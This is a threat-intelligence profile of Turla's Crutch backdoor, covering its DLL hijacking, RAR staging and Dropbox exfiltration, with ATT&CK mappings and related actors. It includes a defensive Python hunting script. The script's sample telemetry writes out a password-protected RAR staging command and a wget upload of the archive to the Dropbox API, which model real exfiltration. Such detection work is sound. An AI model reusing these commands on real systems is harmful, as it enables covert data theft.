Crutch

Malware Profile Updated 3 months ago
Crutch is a second-stage backdoor attributed to the Turla group and publicly documented by ESET researchers in December 2020 (ESET reports it in use from 2015 until at least early 2020). It establishes persistence through DLL hijacking of legitimate applications such as Chrome and Firefox, so the implant runs inside, and its traffic appears to come from, a trusted process. Older iterations carried a backdoor that communicated with a hard-coded Dropbox account through the official HTTP API, with collected files staged locally in RAR archives before upload. Crutch v4 drops the backdoor-command model: it monitors local and removable drives and automatically uploads files of interest to Dropbox storage using the Windows version of the Wget utility.

ESET attributed Crutch to Turla through strong code links between a 2016 Crutch dropper and Gazer, a second-stage backdoor Turla used in 2016-2017. Unit 42's Turla threat group assessment reports that Cortex XDR raised both prevention and detection alerts on Crutch execution, alongside the other families in Turla's arsenal covered there (Capibar, Kazuar, Snake, QUIETCANARY/Tunnus, Kopiluwak, ComRAT, Carbon, HyperStack and TinyTurla). The MITRE ATT&CK techniques listed on this page summarise the observed behaviour: automated collection from removable media, local staging and archiving, and exfiltration to cloud storage over web protocols.
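The behaviours above translate directly into hunting logic. The following is an added example and is not code from this page, from ESET or from Unit 42: it runs three rules over constructed Sysmon-style JSON-lines events that model a browser loading a hijacked DLL (T1574.001), collected files being staged in a RAR archive (T1074.001 / T1560.001), and Dropbox API uploads driven by wget instead of by a process that legitimately uses Dropbox (T1567.002 / T1102.002). Field names follow Sysmon event IDs 1, 7 and 22; the trusted-path and allowed-process lists, paths, user name, timestamps and command lines are assumptions constructed for the example.

```python
"""Hunt for Crutch-style tradecraft in Sysmon-style telemetry (added example, not the page's code)."""
import json
from pathlib import PureWindowsPath

# Host processes the profile names as DLL-hijacking targets (ESET also lists OneDrive).
HIJACK_HOSTS = {"chrome.exe", "firefox.exe", "onedrive.exe"}
# Where those hosts legitimately load code from; assumption, tune per fleet.
TRUSTED_DLL_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\system32\\")
DROPBOX_API_HOSTS = {"api.dropboxapi.com", "content.dropboxapi.com"}
# Processes with a business reason to reach the Dropbox API; assumption, tune per fleet.
DROPBOX_ALLOWED = {"dropbox.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
ARCHIVERS = {"rar.exe", "winrar.exe"}
STAGING_HINTS = ("\\temp\\", "\\appdata\\local\\", "\\programdata\\")


def image_name(path):
    """Lower-cased file name of a Windows path, independent of the host OS."""
    return PureWindowsPath(path).name.lower()


def rule_dll_hijack(ev):
    """EID 7: a hijack-target process loads an unsigned DLL, or one from outside its install tree."""
    if ev.get("EventID") != 7 or image_name(ev["Image"]) not in HIJACK_HOSTS:
        return None
    loaded = ev["ImageLoaded"].lower()
    signed = ev.get("Signed", "false").lower() == "true"  # missing field is treated as unsigned
    if signed and loaded.startswith(TRUSTED_DLL_ROOTS):
        return None
    return ("T1574.001", f"{image_name(ev['Image'])} loaded {ev['ImageLoaded']} (signed={signed})")


def rule_rar_staging(ev):
    """EID 1: a RAR archiver writing into a temp or staging directory."""
    if ev.get("EventID") != 1 or image_name(ev["Image"]) not in ARCHIVERS:
        return None
    cmd = ev.get("CommandLine", "").lower()
    if any(hint in cmd for hint in STAGING_HINTS):
        return ("T1560.001", f"archive staged: {ev['CommandLine']}")
    return None


def rule_dropbox_upload(ev):
    """EID 1: wget invoked against the Dropbox API; EID 22: Dropbox API resolved by an unexpected process."""
    img = image_name(ev.get("Image", ""))
    if ev.get("EventID") == 1 and img == "wget.exe":
        cmd = ev.get("CommandLine", "").lower()
        if any(host in cmd for host in DROPBOX_API_HOSTS):
            return ("T1567.002", f"wget upload to Dropbox: {ev['CommandLine']}")
    if ev.get("EventID") == 22 and ev.get("QueryName", "").lower() in DROPBOX_API_HOSTS:
        if img not in DROPBOX_ALLOWED:
            return ("T1102.002", f"{img} resolved {ev['QueryName']}")
    return None


RULES = (rule_dll_hijack, rule_rar_staging, rule_dropbox_upload)


def hunt(jsonl):
    """Apply every rule to every JSON-lines event; return (time, technique, detail) hits in log order."""
    hits = []
    for line in filter(None, (raw.strip() for raw in jsonl.splitlines())):
        ev = json.loads(line)
        for rule in RULES:
            hit = rule(ev)
            if hit:
                hits.append((ev["UtcTime"], *hit))
    return hits


# Constructed sample telemetry: a benign browser DLL load, a hijacked load, RAR staging
# from a removable drive, the wget upload, and two DNS lookups (one from wget, one from
# the real Dropbox client, which must not alert). Nothing here is a real indicator.
SAMPLE_JSONL = r"""
{"EventID": 7, "UtcTime": "2024-01-01 09:12:01", "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "ImageLoaded": "C:\\Program Files\\Google\\Chrome\\Application\\chrome_elf.dll", "Signed": "true"}
{"EventID": 7, "UtcTime": "2024-01-01 09:12:05", "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "ImageLoaded": "C:\\Program Files\\Mozilla Firefox\\example_hijack.dll", "Signed": "false"}
{"EventID": 1, "UtcTime": "2024-01-01 09:40:17", "Image": "C:\\Program Files\\WinRAR\\Rar.exe", "CommandLine": "Rar.exe a -r -hpexample C:\\Users\\user1\\AppData\\Local\\Temp\\stage.rar E:\\*.docx"}
{"EventID": 1, "UtcTime": "2024-01-01 09:41:02", "Image": "C:\\ProgramData\\wget.exe", "CommandLine": "wget.exe --post-file=C:\\Users\\user1\\AppData\\Local\\Temp\\stage.rar https://content.dropboxapi.com/2/files/upload"}
{"EventID": 22, "UtcTime": "2024-01-01 09:41:02", "Image": "C:\\ProgramData\\wget.exe", "QueryName": "content.dropboxapi.com"}
{"EventID": 22, "UtcTime": "2024-01-01 10:03:44", "Image": "C:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe", "QueryName": "api.dropboxapi.com"}
"""


def hunt_sample():
    """Run the rules over the constructed sample; expect four hits, none from Dropbox.exe."""
    return hunt(SAMPLE_JSONL)


if __name__ == "__main__":
    for when, technique, detail in hunt_sample():
        print(when, technique, detail)
```

The allowlist in `rule_dropbox_upload` deliberately lets chrome.exe and firefox.exe talk to Dropbox, which is exactly why Crutch ran inside those processes: their Dropbox traffic will pass a process-based network rule, so the DLL-load rule has to carry that case, and the wget rule covers the v4 upload path that no longer blends into the browser.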
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
ID | Votes | Profile Description
Snake | 1 | Snake, also known as Turla, Uroburos and Pensive Ursa (not to be confused with the EKANS ransomware, which is also called Snake), is a significant threat actor that has been active since at least 2004, with its activities potentially dating back to the late 1990s. The group, linked to Russia's FSB, targets diplomatic and government organizations as well as private businesses across various reg
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
ATT&CK techniques:
T1008 Fallback Channels
T1020 Automated Exfiltration
T1025 Data from Removable Media
T1036.004 Masquerading: Masquerade Task or Service
T1041 Exfiltration Over C2 Channel
T1053.005 Scheduled Task/Job: Scheduled Task
T1071.001 Application Layer Protocol: Web Protocols
T1074.001 Data Staged: Local Data Staging
T1078.003 Valid Accounts: Local Accounts
T1102.002 Web Service: Bidirectional Communication
T1119 Automated Collection
T1120 Peripheral Device Discovery
T1560.001 Archive Collected Data: Archive via Utility
T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
T1574.001 Hijack Execution Flow: DLL Search Order Hijacking
Keywords: Backdoor, Windows, Malware, APT, Chrome, Outlook, GitHub, Dropbox, Firefox, Encrypt, WinRAR, MITRE, Implant, Dropper
Associated Malware
ID | Type | Votes | Profile Description
Gazer | Unspecified | 1 | Gazer is a second-stage backdoor written in C++ that Turla has used and that ESET publicly documented in August 2017. It was deployed through watering-hole attacks and spear-phishing campaigns, enabling more precise targeting of victims. The malware is attributed to Pensive Ursa due to strong simila
FatDuke | Unspecified | 1 | FatDuke is a sophisticated malware that was first detected in 2013 and primarily targets government entities, defense contractors, and research institutions. The malware is known to be spread through spear-phishing attacks and has been linked to a group of hackers called APT29 or Cozy Bear. Once ins
Kazuar | Unspecified | 1 | Kazuar is a sophisticated multiplatform trojan horse malware, linked to the Russian-based threat group Turla (also known as Pensive Ursa, Uroburos, Snake), which has been operating since at least 2004. This group, believed to be connected to the Russian Federal Security Service (FSB), utilizes an ar
TinyTurla | Unspecified | 1 | TinyTurla is a sophisticated malware linked to the Russia-sponsored threat actor Turla APT. Its TinyTurla-NG variant has been used in a targeted campaign against Polish non-governmental organizations (NGOs), particularly those with connections to supporting Ukraine. TinyTurla operates as a backd
Capibar | Unspecified | 1 | Capibar, a new malware identified as part of the arsenal of the Russian-based threat group Turla (also known as Pensive Ursa, Uroburos, or Snake), has been used in recent cyberattacks. This group, linked to the Russian Federal Security Service (FSB) and active since at least 2004, has deployed Capib
HyperStack | Unspecified | 1 | HyperStack, also known as SilentMoo or BigBoss, is a Remote Procedure Call (RPC) backdoor malware that was first observed in 2018. It has been utilized in operations targeting European government entities and is linked to the Russian-based threat group Pensive Ursa, which has been operational since
Uroburos | Unspecified | 1 | Uroburos, also known as Snake, Turla, Pensive Ursa, and Venomous Bear, is a sophisticated malware linked to the Russian Federal Security Service (FSB). The development of this malicious software began in late 2003, with its operations traced back to at least 2004. Uroburos is part of a broader arsen
KOPILUWAK | Unspecified | 1 | KopiLuwak is a JavaScript-based malware used for command and control (C2) communications and victim profiling. It was initially dropped by Pensive Ursa using an MSIL dropper in a G20-themed attack in 2017, and later as a self-extracting archive (SFX) executable in late 2022. Upon execution, the SFX
Associated Threat Actors
ID | Type | Votes | Profile Description
Turla | Unspecified | 4 | Turla, also known as Pensive Ursa, is a sophisticated threat actor linked to Russia that has been active for many years. The group is known for its advanced cyber-espionage capabilities and has been associated with numerous high-profile breaches. According to the MITRE ATT&CK and MITRE Ingenuity dat
WhiteBear | Unspecified | 1 | WhiteBear is a threat actor cluster associated with the Turla group, also known as Snake, Venomous Bear and Uroburos. The association was established through strong links identified between a Crutch dropper from 2016 and Gazer, a second-stage backdoor used by Turla in 2016-2017. W
Pensive Ursa | Unspecified | 1 | Pensive Ursa, also known as Turla, Uroburos, Venomous Bear, and Waterbug, is a Russian-based advanced persistent threat (APT) group that has been operating since at least 2004. The group, linked to the Russian Federal Security Service (FSB), is renowned for its sophisticated cyber-espionage activiti
Turla Group | Unspecified | 1 | The Turla group, also known as Pensive Ursa, Krypton, Secret Blizzard, Venomous Bear, or Uroburos, is a notable threat actor that has been linked to the Russian Federal Security Service (FSB). With a history dating back to 2004, this group operates in painstaking stages, first conducting reconnaissa
Associated Vulnerabilities
ID | Type | Votes | Profile Description
No associations to display
Source Document References
Information about the Crutch malware was read from the documents corpus below. This display is limited to 20 results.
Source | Created | Title
Trend Micro | 10 months ago | Examining the Activities of the Turla APT Group
Unit42 | 10 months ago | Threat Group Assessment: Turla (aka Pensive Ursa)
CERT-EU | a year ago | Matthieu Faou | WeLiveSecurity
MITRE | a year ago | TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines
MITRE | a year ago | Turla Crutch: Keeping the “back door” open | WeLiveSecurity